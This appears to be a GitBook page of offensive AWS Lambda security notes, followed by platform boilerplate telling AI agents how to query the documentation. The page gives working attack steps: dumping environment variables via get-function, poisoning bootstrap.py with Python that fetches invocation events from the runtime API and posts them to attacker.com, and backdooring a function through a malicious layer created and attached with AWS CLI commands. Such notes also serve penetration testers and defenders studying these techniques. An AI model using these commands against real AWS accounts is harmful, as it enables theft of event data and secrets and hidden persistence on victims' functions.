> For the complete documentation index, see [llms.txt](https://seg-fault.gitbook.io/researchs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://seg-fault.gitbook.io/researchs/aws-cloud-security/hacking-lamda/lambda-security.md).

# Lambda - Security

Following are some interesting security senarios :-

### Senario I - Env Variables

You have got access to Keys that has "GetFunction" permission, then its possible to view Environment variables of the lambda and even download the lambda function.

Permission needed : GetFunction

Command :

```
aws lambda get-function --function-name testDemo
```

The output will contain all the environment variables that were configured with the lambda.

<figure><img src="/files/GJ5qF5Zuli4OjPf37BA5" alt=""><figcaption><p>Get-Function Lambda</p></figcaption></figure>

### Senario II - Runtime Leakage

We have sucessfully compromised a Lambda which runs once every 10 mins and wants to leak all the events passed to the lambda.

There are 2 ways to poision a lambda :-

* In case lambda function is using any import library, we can poision the respective library present in `/var/runtime` since these are refered by lambda whenever function is executed.
* In case there is no import in the main lambda code, then poision bootstrap.py file at `/var/runtime/bootstrap.py` since this file is refered every single time lambda is executed by the init processor.

In order to leak out the even best way would be add couple of lines

```
import urllib3
http = urllib3.PoolManager()

data=http.request('get','127.0.0.1:9001/2018-06-01/runtime/invocation/next').data
http.request('post','http://attacker.com/event',body=data)
```

Above code will query the Runtime and get the current even and pass on the data to the attacker server hereby exfilterating the event.

### Senario III - Layer Backdoor

We have compromised a Lambda and have full access to the function and now want to backdoor the function. In order to backdoor it, we can add a malicious layer to the lambda function.

#### Creating a Layer

In order to create a layer, we first need to create a malicous file that can be later refered by the legit lambda code. For instance if the language is python then we need to create a zip with the our malicous file. The zip directory info should be `python/lib/python3.9/site-packages/`.

<figure><img src="/files/LGKi2RabkhFE50rP1W5D" alt=""><figcaption><p>Zipping a layer</p></figcaption></figure>

In the above example we have created a malicious zipfile which behaves as boto3. We now create a new lambda layer using the above zip file.

```
aws lambda publish-layer-version --layer-name MyLayer --description "Backdoor layer" --license-info "MIT" --zip-file fileb:///layer.zip --c
ompatible-runtimes python3.9 --compatible-architectures "x86_64"  --region us-east-2
```

#### Attach layer to Function

Once layer is ready, we will attach the layer to the target function

```
aws lambda update-function-configuration --function-name securitylabs-lambda --layers arn:aws:lambda:us-east-2:123456789012:MyLayer:layer1:1
```

Now, anytime the function is executed, our layer code will also be loaded and executed prior to actual function execution hereby backdooring the function.

<figure><img src="/files/ZjKE0eod80w2OkqhUaFc" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://seg-fault.gitbook.io/researchs/aws-cloud-security/hacking-lamda/lambda-security.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.